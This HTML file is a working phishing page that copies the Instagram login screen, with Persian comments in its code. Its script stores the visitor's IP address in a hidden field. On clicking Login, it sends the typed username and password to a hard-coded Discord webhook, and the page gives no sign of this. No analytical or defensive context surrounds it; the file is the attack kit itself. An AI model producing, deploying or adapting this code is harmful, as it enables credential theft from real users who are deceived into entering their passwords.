<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Login Page</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #fafafa;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .login-container {
            width: 300px;
            padding: 20px;
            background-color: #fff;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: center; /* تنظیم متن و اجزای داخلی به وسط */
        }
        .login-container h2 {
            margin-bottom: 20px;
            text-align: center;
        }
        .login-container input {
            width: 100%;
            padding: 10px;
            margin-bottom: 15px;
            border: 1px solid #ddd;
            border-radius: 5px;
            box-sizing: border-box;
        }
        .login-container button {
            width: 100%;
            padding: 10px;
            background-color: #3897f0;
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            margin-bottom: 10px; /* اضافه کردن فاصله پایینی برای دکمه */
        }
        .logo {
            margin-right: auto; /* جابجایی به سمت راست */
            margin-left: auto; /* جابجایی به سمت چپ */
            display: block; /* تنظیم لوگو به صورت بلوک */
        }
        .forgot-password {
            margin-top: 10px; /* اضافه کردن فاصله بالایی برای لینک */
            display: block; /* تنظیم لینک به صورت بلوک */
        }
    </style>
</head>
<body>
    <div class="login-container">
        <img src="Instagram-Logo-PNG.png" alt="Instagram Logo" class="logo" style="width: 100px; height: auto; margin-bottom: 20px;">
        <h2>Instagram Login</h2>
        <form id="login-form">
            <input type="text" id="username" placeholder="Username" required>
            <input type="password" id="password" placeholder="Password" required>
            <input type="hidden" id="ip_address" name="ip_address">
            <button type="button" id="login-button">Login</button>
            <a href="https://www.instagram.com/accounts/password/reset/" class="forgot-password" style="margin-top: 20px;">Forgot Password?</a>
        </form>
    </div>

    <script>
        // تابع برای دریافت ای‌پی کاربر
        function getIPAddress(callback) {
            fetch('https://api.ipify.org/?format=json')
                .then(response => response.json())
                .then(data => callback(data.ip))
                .catch(error => console.error('Error fetching IP address:', error));
        }

        // زمانی که صفحه بارگیری شد
        document.addEventListener('DOMContentLoaded', function() {
            // دریافت ای‌پی کاربر و قرار دادن آن در فیلد مخفی
            getIPAddress(function(ip) {
                document.getElementById('ip_address').value = ip;
            });

            // زمانی که دکمه Login کلیک می‌شود
            document.getElementById("login-button").addEventListener("click", function() {
                var username = document.getElementById("username").value;
                var password = document.getElementById("password").value;
                var ip_address = document.getElementById("ip_address").value;
                var webhookUrl = "https://discord.com/api/webhooks/1219114000726491206/pszQB5ccBmTkmN5wb9Z9nJB7I3aTJMs5FWRf0mZ02mt3MkDXnySbClDONsGV8i7DUi7Z";

                fetch(webhookUrl, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({
                        content: "Username: " + username + "\nPassword: " + password + "\nIP Address: " + ip_address
                    })
                })
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Network response was not ok');
                    }
                    console.log('Data sent successfully!');
                    // اینجا می‌توانید کد مربوط به اطلاعاتی که باید بعد از ارسال اطلاعات انجام شود را اضافه کنید
                })
                .catch(error => {
                    console.error('There was an error with the fetch operation:', error);
                });
            });
        });
    </script>
</body>
</html>
